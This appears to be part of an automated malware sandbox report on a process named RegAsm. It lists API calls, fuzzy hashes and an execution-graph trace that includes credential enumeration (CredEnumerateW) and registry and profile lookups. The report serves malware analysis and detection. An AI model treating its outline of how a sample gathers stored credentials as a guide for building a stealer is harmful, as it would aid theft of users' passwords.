                                                                                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1860491036-0
                                                                                                                                              • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                              • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                              APIs
                                                                                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                              • free.MSVCRT ref: 0040A908
                                                                                                                                              • free.MSVCRT ref: 0040A92B
                                                                                                                                              • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                              • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                              • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                              APIs
                                                                                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                              • free.MSVCRT ref: 0040B201
                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                              • free.MSVCRT ref: 0040B224
                                                                                                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                              • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                              • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                              APIs
                                                                                                                                              • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                              • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                              • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 231171946-0
                                                                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                              APIs
                                                                                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                              • free.MSVCRT ref: 0040B12C
                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3669619086-0
                                                                                                                                              • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                              • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                              • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                              • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1033339047-0
                                                                                                                                              • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                              • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                              • malloc.MSVCRT ref: 00417407
                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                              • free.MSVCRT ref: 00417425
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2605342592-0
                                                                                                                                              • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                                                                              • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                              • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                                                                              • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcslen$wcscat$wcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1961120804-0
                                                                                                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:21.8%
                                                                                                                                              Signature Coverage:0.4%
                                                                                                                                              Total number of Nodes:925
                                                                                                                                              Total number of Limit Nodes:15
                                                                                                                                              execution_graph 34241 40fc40 60 API calls 34416 403640 21 API calls 34242 427fa4 42 API calls 34417 412e43 _endthreadex 34418 425115 76 API calls __fprintf_l 34419 43fe40 133 API calls 34245 425115 83 API calls __fprintf_l 34246 401445 memcpy memcpy DialogBoxParamA 34247 440c40 34 API calls 33271 444c4a 33290 444e38 33271->33290 33273 444c56 GetModuleHandleA 33276 444c68 __set_app_type __p__fmode __p__commode 33273->33276 33275 444cfa 33277 444d02 __setusermatherr 33275->33277 33278 444d0e 33275->33278 33276->33275 33277->33278 33291 444e22 _controlfp 33278->33291 33280 444d13 _initterm __getmainargs _initterm 33281 444d6a GetStartupInfoA 33280->33281 33283 444d9e GetModuleHandleA 33281->33283 33292 40cf44 33283->33292 33287 444dcf _cexit 33289 444e04 33287->33289 33288 444dc8 exit 33288->33287 33290->33273 33291->33280 33343 404a99 LoadLibraryA 33292->33343 33294 40cf60 33295 40cf64 33294->33295 33349 410d0e 33294->33349 33295->33287 33295->33288 33297 40cf6f 33353 40ccd7 ??2@YAPAXI 33297->33353 33299 40cf9b 33367 407cbc 33299->33367 33304 40cfc4 33385 409825 memset 33304->33385 33305 40cfd8 33390 4096f4 memset 33305->33390 33310 40d181 ??3@YAXPAX 33312 40d1b3 33310->33312 33313 40d19f DeleteObject 33310->33313 33311 407e30 _strcmpi 33314 40cfee 33311->33314 33414 407948 free free 33312->33414 33313->33312 33316 40cff2 RegDeleteKeyA 33314->33316 33317 40d007 EnumResourceTypesA 33314->33317 33316->33310 33319 40d047 33317->33319 33320 40d02f MessageBoxA 33317->33320 33318 40d1c4 33415 4080d4 free 33318->33415 33321 40d0a0 CoInitialize 33319->33321 33395 40ce70 33319->33395 33320->33310 33412 40cc26 strncat memset RegisterClassA CreateWindowExA 33321->33412 33325 40d1cd 33416 407948 free free 33325->33416 33327 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33413 40c256 PostMessageA 33327->33413 33329 40d061 ??3@YAXPAX 33329->33312 33332 40d084 DeleteObject 33329->33332 33330 40d09e 33330->33321 33332->33312 33335 40d0f9 GetMessageA 33336 40d17b CoUninitialize 33335->33336 33338 40d10d 33335->33338 33336->33310 33337 40d113 TranslateAccelerator 33337->33338 33339 40d16d GetMessageA 33337->33339 33338->33337 33340 40d145 IsDialogMessage 33338->33340 33341 40d139 IsDialogMessage 33338->33341 33339->33336 33339->33337 33340->33339 33342 40d157 TranslateMessage DispatchMessageA 33340->33342 33341->33339 33341->33340 33342->33339 33344 404ae8 33343->33344 33348 404ac4 FreeLibrary 33343->33348 33346 404b13 33344->33346 33347 404afc MessageBoxA 33344->33347 33346->33294 33347->33294 33348->33344 33350 410d17 LoadLibraryA 33349->33350 33351 410d3c 33349->33351 33350->33351 33352 410d2b 33350->33352 33351->33297 33352->33351 33354 40cd08 ??2@YAPAXI 33353->33354 33356 40cd26 33354->33356 33357 40cd2d 33354->33357 33424 404025 6 API calls 33356->33424 33359 40cd66 33357->33359 33360 40cd59 DeleteObject 33357->33360 33417 407088 33359->33417 33360->33359 33362 40cd6b 33420 4019b5 33362->33420 33365 4019b5 strncat 33366 40cdbf _mbscpy 33365->33366 33366->33299 33426 407948 free free 33367->33426 33370 407cf7 33372 407a1f malloc memcpy free free 33370->33372 33373 407ddc 33370->33373 33375 407d7a free 33370->33375 33380 407e04 33370->33380 33427 40796e strlen 33370->33427 33440 406f30 33370->33440 33372->33370 33373->33380 33448 407a1f 33373->33448 33375->33370 33379 40796e 7 API calls 33379->33380 33437 407a55 33380->33437 33381 407e30 33382 407e38 33381->33382 33384 407e57 33381->33384 33383 407e41 _strcmpi 33382->33383 33382->33384 33383->33382 33383->33384 33384->33304 33384->33305 33453 4097ff 33385->33453 33387 409854 33458 409731 33387->33458 33391 4097ff 3 API calls 33390->33391 33392 409723 33391->33392 33478 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33392->33478 33394 40972b 33394->33311 33479 4023b2 33395->33479 33400 40ced3 33569 40cdda 7 API calls 33400->33569 33401 40cece 33405 40cf3f 33401->33405 33520 40c3d0 memset GetModuleFileNameA strrchr 33401->33520 33405->33329 33405->33330 33408 40ceed 33548 40affa 33408->33548 33412->33327 33413->33335 33414->33318 33415->33325 33416->33295 33425 406fc7 memset _mbscpy 33417->33425 33419 40709f CreateFontIndirectA 33419->33362 33421 4019e1 33420->33421 33422 4019c2 strncat 33421->33422 33423 4019e5 memset LoadIconA 33421->33423 33422->33421 33423->33365 33424->33357 33425->33419 33426->33370 33428 4079a1 33427->33428 33429 407998 free 33427->33429 33431 406f30 3 API calls 33428->33431 33430 4079ab 33429->33430 33432 4079c4 33430->33432 33433 4079bb free 33430->33433 33431->33430 33435 406f30 3 API calls 33432->33435 33434 4079d0 memcpy 33433->33434 33434->33370 33436 4079cf 33435->33436 33436->33434 33438 407a65 33437->33438 33439 407a5b free 33437->33439 33438->33381 33439->33438 33441 406f37 malloc 33440->33441 33442 406f7d 33440->33442 33444 406f73 33441->33444 33445 406f58 33441->33445 33442->33370 33444->33370 33446 406f6c free 33445->33446 33447 406f5c memcpy 33445->33447 33446->33444 33447->33446 33449 407a38 33448->33449 33450 407a2d free 33448->33450 33451 406f30 3 API calls 33449->33451 33452 407a43 33450->33452 33451->33452 33452->33379 33469 406f96 GetModuleFileNameA 33453->33469 33455 409805 strrchr 33456 409814 33455->33456 33457 409817 _mbscat 33455->33457 33456->33457 33457->33387 33470 44b090 33458->33470 33460 40973e _mbscpy _mbscpy 33472 40930c 33460->33472 33463 40930c 3 API calls 33464 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33463->33464 33465 4097c5 LoadStringA 33464->33465 33466 4097db 33465->33466 33466->33465 33468 4097f3 33466->33468 33477 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33466->33477 33468->33310 33469->33455 33471 44b097 33470->33471 33471->33460 33471->33471 33473 44b090 33472->33473 33474 409319 memset GetPrivateProfileStringA 33473->33474 33475 409374 33474->33475 33476 409364 WritePrivateProfileStringA 33474->33476 33475->33463 33476->33475 33477->33466 33478->33394 33571 409c1c 33479->33571 33482 401e69 memset 33610 410dbb 33482->33610 33485 401ec2 33641 4070e3 strlen _mbscat _mbscpy _mbscat 33485->33641 33486 401ed4 33626 406f81 GetFileAttributesA 33486->33626 33489 401ee6 strlen strlen 33491 401f15 33489->33491 33492 401f28 33489->33492 33642 4070e3 strlen _mbscat _mbscpy _mbscat 33491->33642 33627 406f81 GetFileAttributesA 33492->33627 33495 401f35 33628 401c31 33495->33628 33498 401f75 33640 410a9c RegOpenKeyExA 33498->33640 33499 401c31 7 API calls 33499->33498 33501 401f91 33502 402187 33501->33502 33503 401f9c memset 33501->33503 33505 402195 ExpandEnvironmentStringsA 33502->33505 33506 4021a8 _strcmpi 33502->33506 33643 410b62 RegEnumKeyExA 33503->33643 33652 406f81 GetFileAttributesA 33505->33652 33506->33400 33506->33401 33508 40217e RegCloseKey 33508->33502 33509 401fd9 atoi 33510 401fef memset memset sprintf 33509->33510 33513 401fc9 33509->33513 33644 410b1e 33510->33644 33513->33508 33513->33509 33514 402165 33513->33514 33515 402076 memset memset strlen strlen 33513->33515 33516 4070e3 strlen _mbscat _mbscpy _mbscat 33513->33516 33517 4020dd strlen strlen 33513->33517 33518 406f81 GetFileAttributesA 33513->33518 33519 402167 _mbscpy 33513->33519 33651 410b62 RegEnumKeyExA 33513->33651 33514->33508 33515->33513 33516->33513 33517->33513 33518->33513 33519->33508 33521 40c422 33520->33521 33522 40c425 _mbscat _mbscpy _mbscpy 33520->33522 33521->33522 33523 40c49d 33522->33523 33524 40c502 GetWindowPlacement 33523->33524 33525 40c512 33523->33525 33524->33525 33526 40c538 33525->33526 33673 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33525->33673 33666 409b31 33526->33666 33530 40ba28 33531 40ba87 33530->33531 33537 40ba3c 33530->33537 33676 406c62 LoadCursorA SetCursor 33531->33676 33533 40ba43 _mbsicmp 33533->33537 33534 40ba8c 33677 410a9c RegOpenKeyExA 33534->33677 33678 4107f1 33534->33678 33681 410808 33534->33681 33685 404734 33534->33685 33691 404785 33534->33691 33694 403c16 33534->33694 33535 40baa0 33536 407e30 _strcmpi 33535->33536 33540 40bab0 33536->33540 33537->33531 33537->33533 33767 40b5e5 10 API calls 33537->33767 33538 40bafa SetCursor 33538->33408 33540->33538 33541 40baf1 qsort 33540->33541 33541->33538 34225 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33548->34225 33550 40b00e 33551 40b016 33550->33551 33552 40b01f GetStdHandle 33550->33552 34226 406d1a CreateFileA 33551->34226 33554 40b01c 33552->33554 33555 40b035 33554->33555 33556 40b12d 33554->33556 34227 406c62 LoadCursorA SetCursor 33555->34227 34231 406d77 9 API calls 33556->34231 33559 40b136 33570 40c580 18 API calls 33559->33570 33560 40b087 33567 40b0a1 33560->33567 34229 40a699 12 API calls 33560->34229 33561 40b042 33561->33560 33561->33567 34228 40a57c strlen WriteFile 33561->34228 33564 40b0d6 33565 40b116 CloseHandle 33564->33565 33566 40b11f SetCursor 33564->33566 33565->33566 33566->33559 33567->33564 34230 406d77 9 API calls 33567->34230 33569->33401 33570->33405 33583 409a32 33571->33583 33574 409c80 memcpy memcpy 33577 409cda 33574->33577 33575 409d18 ??2@YAPAXI ??2@YAPAXI 33578 409d54 ??2@YAPAXI 33575->33578 33580 409d8b 33575->33580 33576 408db6 12 API calls 33576->33577 33577->33574 33577->33575 33577->33576 33578->33580 33580->33580 33593 409b9c 33580->33593 33582 4023c1 33582->33482 33584 409a44 33583->33584 33585 409a3d ??3@YAXPAX 33583->33585 33586 409a52 33584->33586 33587 409a4b ??3@YAXPAX 33584->33587 33585->33584 33588 409a63 33586->33588 33589 409a5c ??3@YAXPAX 33586->33589 33587->33586 33590 409a83 ??2@YAPAXI ??2@YAPAXI 33588->33590 33591 409a73 ??3@YAXPAX 33588->33591 33592 409a7c ??3@YAXPAX 33588->33592 33589->33588 33590->33574 33591->33592 33592->33590 33594 407a55 free 33593->33594 33595 409ba5 33594->33595 33596 407a55 free 33595->33596 33597 409bad 33596->33597 33598 407a55 free 33597->33598 33599 409bb5 33598->33599 33600 407a55 free 33599->33600 33601 409bbd 33600->33601 33602 407a1f 4 API calls 33601->33602 33603 409bd0 33602->33603 33604 407a1f 4 API calls 33603->33604 33605 409bda 33604->33605 33606 407a1f 4 API calls 33605->33606 33607 409be4 33606->33607 33608 407a1f 4 API calls 33607->33608 33609 409bee 33608->33609 33609->33582 33611 410d0e LoadLibraryA 33610->33611 33612 410dca 33611->33612 33613 410dfd memset 33612->33613 33653 4070ae 33612->33653 33615 410e1d 33613->33615 33656 410a9c RegOpenKeyExA 33615->33656 33617 410dee SHGetSpecialFolderPathA 33620 401e9e strlen strlen 33617->33620 33619 410e4a 33621 410e7f _mbscpy 33619->33621 33657 410d3d _mbscpy 33619->33657 33620->33485 33620->33486 33621->33620 33623 410e5b 33658 410add RegQueryValueExA 33623->33658 33625 410e73 RegCloseKey 33625->33621 33626->33489 33627->33495 33659 410a9c RegOpenKeyExA 33628->33659 33630 401c4c 33631 401cad 33630->33631 33660 410add RegQueryValueExA 33630->33660 33631->33498 33631->33499 33633 401c6a 33634 401c71 strchr 33633->33634 33635 401ca4 RegCloseKey 33633->33635 33634->33635 33636 401c85 strchr 33634->33636 33635->33631 33636->33635 33637 401c94 33636->33637 33661 406f06 strlen 33637->33661 33639 401ca1 33639->33635 33640->33501 33641->33486 33642->33492 33643->33513 33664 410a9c RegOpenKeyExA 33644->33664 33646 410b34 33647 410b5d 33646->33647 33665 410add RegQueryValueExA 33646->33665 33647->33513 33649 410b4c RegCloseKey 33649->33647 33651->33513 33652->33506 33654 4070bd GetVersionExA 33653->33654 33655 4070ce 33653->33655 33654->33655 33655->33613 33655->33617 33656->33619 33657->33623 33658->33625 33659->33630 33660->33633 33662 406f17 33661->33662 33663 406f1a memcpy 33661->33663 33662->33663 33663->33639 33664->33646 33665->33649 33667 409b40 33666->33667 33669 409b4e 33666->33669 33674 409901 memset SendMessageA 33667->33674 33670 409b99 33669->33670 33671 409b8b 33669->33671 33670->33530 33675 409868 SendMessageA 33671->33675 33673->33526 33674->33669 33675->33670 33676->33534 33677->33535 33679 410807 33678->33679 33680 4107fc FreeLibrary 33678->33680 33679->33535 33680->33679 33682 410816 33681->33682 33683 4107f1 FreeLibrary 33682->33683 33684 410825 33683->33684 33684->33535 33686 404785 FreeLibrary 33685->33686 33687 40473b LoadLibraryA 33686->33687 33689 40474c 33687->33689 33688 404781 33688->33535 33689->33688 33690 404785 FreeLibrary 33689->33690 33690->33688 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33535 33693->33692 33695 4107f1 FreeLibrary 33694->33695 33696 403c30 LoadLibraryA 33695->33696 33697 403c44 33696->33697 33698 4107f1 FreeLibrary 33697->33698 33699 403c6b 33697->33699 33698->33699 33700 404734 2 API calls 33699->33700 33701 403c86 33700->33701 33768 4036e5 33701->33768 33704 4036e5 27 API calls 33705 403c9a 33704->33705 33706 4036e5 27 API calls 33705->33706 33707 403ca4 33706->33707 33708 4036e5 27 API calls 33707->33708 33709 403cae 33708->33709 33780 4085d2 33709->33780 33717 403ce5 33718 403cf7 33717->33718 33968 402bd1 40 API calls 33717->33968 33828 410a9c RegOpenKeyExA 33718->33828 33721 403d0a 33722 403d1c 33721->33722 33969 402bd1 40 API calls 33721->33969 33829 402c5d 33722->33829 33726 4070ae GetVersionExA 33727 403d31 33726->33727 33847 410a9c RegOpenKeyExA 33727->33847 33729 403d51 33730 403d61 33729->33730 33848 402b22 memset 33729->33848 33857 410a9c RegOpenKeyExA 33730->33857 33733 403d87 33734 403d97 33733->33734 33735 402b22 47 API calls 33733->33735 33858 410a9c RegOpenKeyExA 33734->33858 33735->33734 33737 403dbd 33738 403dcd 33737->33738 33739 402b22 47 API calls 33737->33739 33740 410808 FreeLibrary 33738->33740 33739->33738 33741 403ddd 33740->33741 33742 404785 FreeLibrary 33741->33742 33743 403de8 33742->33743 33859 402fdb 33743->33859 33746 402fdb 34 API calls 33747 403e00 33746->33747 33875 4032b7 33747->33875 33756 403e3b 33757 403e73 33756->33757 33758 403e46 _mbscpy 33756->33758 33922 40fb00 33757->33922 33971 40f334 324 API calls 33758->33971 33767->33537 33769 4036fb 33768->33769 33772 4037c5 33768->33772 33972 410863 UuidFromStringA UuidFromStringA 33769->33972 33772->33704 33773 403716 strchr 33773->33772 33774 403730 33773->33774 33976 4021b6 memset 33774->33976 33776 40373f _mbscpy _mbscpy strlen 33777 4037a4 _mbscpy 33776->33777 33778 403789 sprintf 33776->33778 33977 4023e5 16 API calls 33777->33977 33778->33777 33781 4085e2 33780->33781 33978 4082cd 11 API calls 33781->33978 33785 408600 33786 403cba 33785->33786 33787 40860b memset 33785->33787 33798 40821d 33786->33798 33981 410b62 RegEnumKeyExA 33787->33981 33789 4086d2 RegCloseKey 33789->33786 33791 408637 33791->33789 33792 40865c memset 33791->33792 33982 410a9c RegOpenKeyExA 33791->33982 33985 410b62 RegEnumKeyExA 33791->33985 33983 410add RegQueryValueExA 33792->33983 33795 408694 33984 40848b 9 API calls 33795->33984 33797 4086ab RegCloseKey 33797->33791 33986 410a9c RegOpenKeyExA 33798->33986 33800 40823f 33801 403cc6 33800->33801 33802 408246 memset 33800->33802 33810 4086e0 33801->33810 33987 410b62 RegEnumKeyExA 33802->33987 33804 40826f 33805 4082bf RegCloseKey 33804->33805 33988 410a9c RegOpenKeyExA 33804->33988 33989 4080ed 10 API calls 33804->33989 33990 410b62 RegEnumKeyExA 33804->33990 33805->33801 33809 4082a2 RegCloseKey 33809->33804 33991 4045db 33810->33991 33814 40872d 33817 408737 wcslen 33814->33817 33818 4088ef 33814->33818 33816 40872b CredEnumerateW 33816->33814 33817->33818 33824 40876a 33817->33824 33997 404656 33818->33997 33819 40877a wcsncmp 33819->33824 33821 404734 2 API calls 33821->33824 33822 404785 FreeLibrary 33822->33824 33823 408812 memset 33823->33824 33825 40883c memcpy wcschr 33823->33825 33824->33818 33824->33819 33824->33821 33824->33822 33824->33823 33824->33825 33826 4088c3 LocalFree 33824->33826 34000 40466b _mbscpy 33824->34000 33825->33824 33826->33824 33827 410a9c RegOpenKeyExA 33827->33717 33828->33721 34001 410a9c RegOpenKeyExA 33829->34001 33831 402c7a 33832 402da5 33831->33832 33833 402c87 memset 33831->33833 33832->33726 34002 410b62 RegEnumKeyExA 33833->34002 33835 402d9c RegCloseKey 33835->33832 33836 410b1e 3 API calls 33837 402ce4 memset sprintf 33836->33837 34003 410a9c RegOpenKeyExA 33837->34003 33839 402d28 33840 402d3a sprintf 33839->33840 34006 402bd1 40 API calls 33839->34006 34004 410a9c RegOpenKeyExA 33840->34004 33845 402cb2 33845->33835 33845->33836 33846 402d9a 33845->33846 34005 410b62 RegEnumKeyExA 33845->34005 34007 402bd1 40 API calls 33845->34007 33846->33835 33847->33729 34008 410b62 RegEnumKeyExA 33848->34008 33850 402bbb RegCloseKey 33850->33730 33851 406f06 2 API calls 33853 402b58 33851->33853 